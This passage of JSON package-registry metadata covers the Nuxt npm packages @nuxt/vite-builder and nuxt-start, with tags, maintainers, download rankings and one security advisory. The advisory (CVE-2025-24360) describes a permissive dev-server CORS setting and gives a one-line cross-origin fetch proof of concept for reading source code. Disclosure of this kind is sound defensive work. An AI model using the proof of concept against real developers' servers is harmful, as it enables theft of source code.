https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1/manifests"},{"name":"v0.4.0","sha":"c5c9448a264327adab3920d07937f819f5c0a3c4","kind":"commit","published_at":"2016-11-11T14:30:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.0/manifests"},{"name":"v0.3.8","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"4b0b83b782ba2c865722dbd80521ca6aa1d63b4a","kind":"commit","published_at":"2016-11-11T00:35:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"5b0ff5617b97d050983358879b6a70835d63be8a","kind":"commit","published_at":"2016-11-10T23:01:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"cb7406cba6a42a4009660569c921f7fdca5bb209","kind":"commit","published_at":"2016-11-10T18:34:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"ea1c5dee15ed92add7e8f69bd523cb090161194e","kind":"commit","published_at":"2016-11-10T16:16:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"9f370cb97c98ff40d4ed5c871147f3c441883b7f","kind":"commit","published_at":"2016-11-10T14:09:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:52:03.910Z","dependent_packages_count":33,"downloads":5430192,"downloads_period":"last-month","dependent_repos_count":6066,"rankings":{"downloads":0.23084069861131123,"dependent_repos_count":0.30577841872158995,"dependent_packages_count":0.8098517902532928,"stargazers_count":0.15559799533710655,"forks_count":0.5233980135042239,"docker_downloads_count":0.8529387192798802,"average":0.4797342726179008},"purl":"pkg:npm/%40nuxt/vite-builder","advisories":[{"uuid":"GSA_kwCzR0hTQS0yNDUyLTZ4ajgtamg0N84ABD1o","url":"https://github.com/advisories/GHSA-2452-6xj8-jh47","title":"Opening a malicious website while running a Nuxt dev server could allow read-only access to code","description":"### Summary\nNuxt allows any websites to send any requests to the development server and read the response due to default CORS settings.\n\n### Details\nWhile Vite patched the default CORS settings to fix https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6, nuxt uses its own CORS handler by default (https://github.com/nuxt/nuxt/pull/23995).\n\nhttps://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263\n\nThat CORS handler sets `Access-Control-Allow-Origin: *`.\n\n\u003e [!IMPORTANT]  \n\u003e If on an affected version, it may be possible to opt-out of the default Nuxt CORS handler by configuring `vite.server.cors`.\n\n### PoC\n1. Start a dev server in any nuxt project using Vite by `nuxt dev`.\n2. Send a fetch request to `http://localhost:3000/_nuxt/app.vue` (`fetch('http://localhost:3000/_nuxt/app.vue')`) from a different origin page.\n\n### Impact\nUsers with the default server.cors option using Vite builder may get the source code stolen by malicious websites\n\n### Additional Information\n`/__nuxt_vite_node__/manifest` / `/__nuxt_vite_node__/module` also seems to have `Access-Control-Allow-Origin: *`, so it maybe also possible to exploit that handler.\nhttps://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39\nAlthough I didn't find a valid module id.\nNote that this handler is probably also vulnerable to DNS rebinding attacks as I didn't find any host header checks.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-01-27T11:31:14.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.3,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N","references":["https://github.com/nuxt/nuxt/security/advisories/GHSA-2452-6xj8-jh47","https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6","https://nvd.nist.gov/vuln/detail/CVE-2025-24360","https://github.com/nuxt/nuxt/pull/23995","https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f","https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/client.ts#L257-L263","https://github.com/nuxt/nuxt/blob/7d345c71462d90187fd09c96c7692f306c90def5/packages/vite/src/vite-node.ts#L39","https://github.com/advisories/GHSA-2452-6xj8-jh47"],"source_kind":"github","identifiers":["GHSA-2452-6xj8-jh47","CVE-2025-24360"],"repository_url":"https://github.com/nuxt/nuxt","blast_radius":0.0,"created_at":"2025-01-27T12:09:16.564Z","updated_at":"2026-05-06T10:03:42.457Z","epss_percentage":0.00308,"epss_percentile":0.5363,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNDUyLTZ4ajgtamg0N84ABD1o","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS0yNDUyLTZ4ajgtamg0N84ABD1o","packages":[{"ecosystem":"npm","package_name":"@nuxt/vite-builder","versions":[{"first_patched_version":"3.15.3","vulnerable_version_range":"\u003e= 3.8.1, \u003c 3.15.3"}],"purl":"pkg:npm/%40nuxt%2Fvite-builder"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yNDUyLTZ4ajgtamg0N84ABD1o/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/vite-builder","docker_dependents_count":102,"docker_downloads_count":6751,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/vite-builder","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/vite-builder/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvite-builder/codemeta","maintainers":[{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:37.585Z","updated_at":"2023-08-19T18:25:37.585Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":2124783,"name":"nuxt-start","ecosystem":"npm","description":"Starts Nuxt Application in production mode","homepage":"https://github.com/nuxt/nuxt.js#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":["nuxt","nuxt.js","nuxtjs","ssr","vue","vue isomorphic","vue server side","vue ssr","vue universal","vue versatile","vue.js","vuejs"],"namespace":null,"versions_count":83,"first_release_published_at":"2017-06-21T16:47:59.272Z","latest_release_published_at":"2024-06-28T11:35:21.435Z","latest_release_number":"2.18.1","last_synced_at":"2026-05-11T05:01:20.214Z","created_at":"2022-04-09T21:20:09.195Z","updated_at":"2026-05-11T05:01:20.215Z","registry_url":"https://www.npmjs.com/package/nuxt-start","install_command":"npm install nuxt-start","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"1.0.0-rc4","2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2023-12-19T00:39:48.000Z","size":110320,"stargazers_count":49067,"open_issues_count":998,"forks_count":4604,"subscribers_count":782,"default_branch":"main","last_synced_at":"2023-12-19T08:47:20.125Z","etag":null,"topics":["csr","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-03-18T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":221370872,"owners_count":16806934,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f9